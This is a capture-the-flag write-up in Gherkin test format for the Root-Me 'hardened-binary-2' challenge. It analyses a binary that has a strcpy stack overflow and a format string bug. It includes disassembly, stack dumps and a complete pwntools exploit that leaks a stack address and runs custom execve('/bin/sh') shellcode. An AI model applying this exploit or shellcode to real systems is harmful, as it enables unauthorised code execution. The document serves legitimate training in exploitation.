## Version 2.0
## language: en

Feature: hardened-binary-2
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: read only
    NX: disabled (heap and stack)
    ASLR: enable
    SF: disable
    SSP: enable
    SRC: disabled
    """

  Scenario: Success: Analyzing the binary
    Given the source code is not provided
    Then I analyze the binary with IDA disassembler
    And I notice a couple of bugs that I am going to explain in detail
    Then the bugs are:
    """
    1. Stack buffer overflow
    2. Format String Bug
    """
    And to see how the first bug is triggered, stack overflow
    Then I had to analyze a routine that is in charge of entering stdin data
    And this data is stored in a buffer of length 1046 [evidences](stack.png)
    """
    0x0804869D mov     dword ptr [esp+428h], 0
    0x080486A8 mov     eax, ds:stdin@@GLIBC_2_0
    0x080486AD mov     [esp+8], eax    ; stream
    0x080486B1 mov     dword ptr [esp+4], 400h ; n
    0x080486B9 lea     eax, [esp+440h+s]
    0x080486BD mov     [esp], eax      ; s
    0x080486C0 call    _fgets
    0x080486C5 mov     dword ptr [esp+428h], 0
    0x080486D0 jmp     short loc_8048706
    """
    Then this fgets gets just 0x400 (1024) bytes for a buffer of 1046
    And this indicates that there is no overflow
    Then checks the buffer byte by byte
    And if it finds a byte equal to "n" or "N" [evidences](cmpn.png)
    Then replaces it with "0" [evidences](zero.png)
    When all the bytes have been compared jump to an interesting routine
    """
    0x0804871D lea     eax, [esp+418h]
    0x08048724 mov     [esp+42Ch], eax
    0x0804872B lea     eax, [esp+418h]
    0x08048732 add     eax, 4
    0x08048735 mov     [esp+420h], eax
    0x0804873C lea     eax, [esp+440h+s]
    0x08048740 mov     [esp+4], eax    ; src
    0x08048744 mov     eax, [esp+420h]
    0x0804874B mov     [esp], eax      ; dest
    0x0804874E call    _strcpy
    0x08048753 lea     eax, [esp+440h+s]
    0x08048757 mov     [esp], eax      ; format
    0x0804875A call    _printf
    0x0804875F mov     eax, ds:stdout@@GLIBC_2_0
    0x08048764 mov     [esp], eax      ; stream
    0x08048767 call    _fflush
    0x0804876C movzx   eax, byte ptr [esp+41Ch]
    0x08048774 cmp     al, 30h ; '0'
    0x08048776 jnz     short loc_8048782
    """
    Then what it does is take the bytes from the buffer (lea  eax, [esp+440h+s])
    And copy them to a very high address on the stack (mov  eax, [esp+420h])
    Then copying the bytes the stack would look like this:
    """
    +---------------+
    | buff (1064)   |
    |               |
    | dest (1064)   |
    +---------------+
    | s (ebp)       |
    +---------------+
    | r (retn)      |
    +---------------+
    """
    And this behavior can become a Stack Buffer Overflow because
    """
    strcpy does not check the length of the bytes to be copied
    """
    And is copying at an offset ahead of the same buffer
    Then it could overflow the destination buffer
    And overwrite ebp, eip, arguments and many more values on the stack
    Then the following bug is a "Format String Bug"
    """
    0x08048753 lea     eax, [esp+440h+s]
    0x08048757 mov     [esp], eax      ; format
    0x0804875A call    _printf
    """
    When I analyze this in detail I realize that printf is not called correctly
    Then printf function works in the following way
    """
    printf(const char *format, ...);

    Where format is a string that manages the format to print, example:
    %s = string
    %d = decimal
    %p = pointer
    ... indicates the values to print or the pointer to print
    """
    And the function uses the buffer as format, in this way:
    """
    printf(buffer);
    """
    Then this could be used by performing a Format String Attack

  Scenario: Fail:Exploiting the binary with shellcode
    Given I identify the bugs
    Then the idea is exploit the buffer overflow
    And thanks to no NX redirect the eip for the shellcode
    Then this approach is limited because the binary has ASLR
    And because the stack is constantly changing
    Then I couldn't reliably execute the shellcode
    And that is why there is the Format String Bug
    Then my idea was to use the format bug to leak the pointer to retn
    """
    pwndbg> x/276wx $esp
    ...
    0xffffd3c0: 0x00000340  0x00000340  0xf7fdf429  0x6e43a318
    0xffffd3d0: 0xf7ffde00  0xffffd444  0x00000000  0xf7fdffbb
    0xffffd3e0: 0xffffd4ac  0xffffd444  0xf7ffdd8c  0x00000000
    0xffffd3f0: 0xffffd4e0  0x00000000  0x00000000  0x00000000
    0xffffd400: 0xf7ffdc30  0x00000000  0x00000000  0x00000000
    0xffffd410: 0x00000000  0xf7ffd000  0x00000000  0x00000000
    0xffffd420: 0x00000000  0x00000000  0x00000000  0x00000000
    0xffffd430: 0x00000009  0xf7fbe000  0x000000c2  0x00000fff
    0xffffd440: 0x00000000  0xf7fd41a0  0xf7e81c59  0x000000c2
    0xffffd450: 0xf7ffc984  0xf7ffc988  0xffffd49a  0xf7e81fb0
    0xffffd460: 0xffffd49a  0xf7ffc984  0xf7ffc988  0xffffd4a8
    0xffffd470: 0xffffd4ac  0xffffd49b  0x00000001  0x000000c2
    0xffffd480: 0x00000000  0x00c30000  0x00000001  0xf7ffc900
    0xffffd490: 0xffffd4e0  0x00000000  0x00000000  0x5509f400
    0xffffd4a0: 0x00000009  0xffffd6c1  0xf7e190a9  0x08048500
    0xffffd4b0: 0xf7fbe000  0x08049fd0  0xffffd4c8  0x0804843d
    0xffffd4c0: 0xf7fbe3fc  0x00000000  0xffffd4f8  0x000a7825
    0xffffd4d0: 0xffffd4cc  0x000191db  0x00000003  0xffffd4c8
    0xffffd4e0: 0xf7fe59d0  0x00000000  0x080487cb  0x00000000
    0xffffd4f0: 0xf7fbe000  0xf7fbe000  0x00000000  0xf7e01e91
    pwndbg>
    """ [evidences](ptrearly.png)
    Then seeing pointers close to the retn I find the exact difference for this
    """
    p.sendline('%208$x')
    ptr_to_retn = int(p.recvline(), 16) + 28
    """ [evidences](difftoret.png)
    Then now I can effectively take advantage of the stack buffer overflow
    And execute the shellcode
    Then there are many shellcodes on the internet to execute /bin/sh
    And I chose the following from shell-storm:
    """
    http://shell-storm.org/shellcode/files/shellcode-251.php
    """
    Then all the execution flow was fine until obtaining the path of /bin/sh
    And this failed because the binary replaces the letter "n | N" with "0"
    Then "/bin/sh" would become "/bi0/sh" [evidences](nonchar.png)

  Scenario: Success:Exploiting the binary with custom shellcode
    Given I manage to exploit the binary but still no get shell
    Then the idea is to execute "/bin/sh"
    And because the binary replaces "n | N" with "0"
    Then I must find a way to avoid it
    And after many tries I thought about customizing the shellcode
    Then the first thing I did was locate the character "n" in memory
    And I got: [evidences](getn.png)
    """
    0x804833f = "n"
    """
    And I execute the shellcode normally but before calling sys_execve
    Then I modify the shellcode to change the "0" for "n" [evidences](csh.png)
    And I do this with the three following instructions:
    """
    shellcode += asm('mov dl, byte ptr ds:[0x804833f]') # ptr to "n" byte
    shellcode += asm('mov byte ptr [esp+3], dl')
    shellcode += asm('xor edx, edx')
    """
    Then now if it is possible to execute /bin/sh [evidences](nice.png)
    And my full exploit is:
    """
    from pwn import *

    p = process('./ch22')
    #p = remote('challenge03.root-me.org',   56522)
    pause()

    p.sendline('%208$x')
    ptr_to_retn = int(p.recvline(), 16) + 28

    shellcode = b""
    shellcode += b"\x6a\x17"                    # push $0x17
    shellcode += b"\x58"                        # pop  %eax
    shellcode += b"\x31\xdb"                    # xor  %ebx, %ebx
    shellcode += b"\xcd\x80"                    # int  $0x80shellcode
    shellcode += b"\x6a\x2e"                    # push $0x2e
    shellcode += b"\x58"                        # pop  %eax
    shellcode += b"\x53"                        # push %ebx
    shellcode += b"\xcd\x80"                    # int  $0x80
    shellcode += b"\x31\xd2"                    # xor  %edx, %edx
    shellcode += b"\x6a\x0b"                    # push $0xb
    shellcode += b"\x58"                        # pop  %eax
    shellcode += b"\x52"                        # push %edx
    shellcode += b"\x68\x2f\x2f\x73\x68"        # push $0x68732f2f
    shellcode += b"\x68\x2f\x62\x69\x6e"        # push $0x6e69622f
    shellcode += asm('mov dl, byte ptr ds:[0x804833f]') # ptr to "n" byte
    shellcode += asm('mov byte ptr [esp+3], dl')
    shellcode += asm('xor edx, edx')
    shellcode += b"\x89\xe3"                    # mov  %esp, %ebx
    shellcode += b"\x52"                        # push %edx
    shellcode += b"\x53"                        # push %ebx
    shellcode += b"\x89\xe1"                    # mov  %esp, %ecx
    shellcode += b"\xcd\x80"                    # int  $0x80

    print ("Leak &retn: 0x%.8x" % ptr_to_retn)
    p.sendline(b'A' * 48 + p32(ptr_to_retn + 4) + shellcode)
    p.sendline(b'0')

    p.interactive()
    """
    And voila, this way I could reliably exploit the binary and get shell
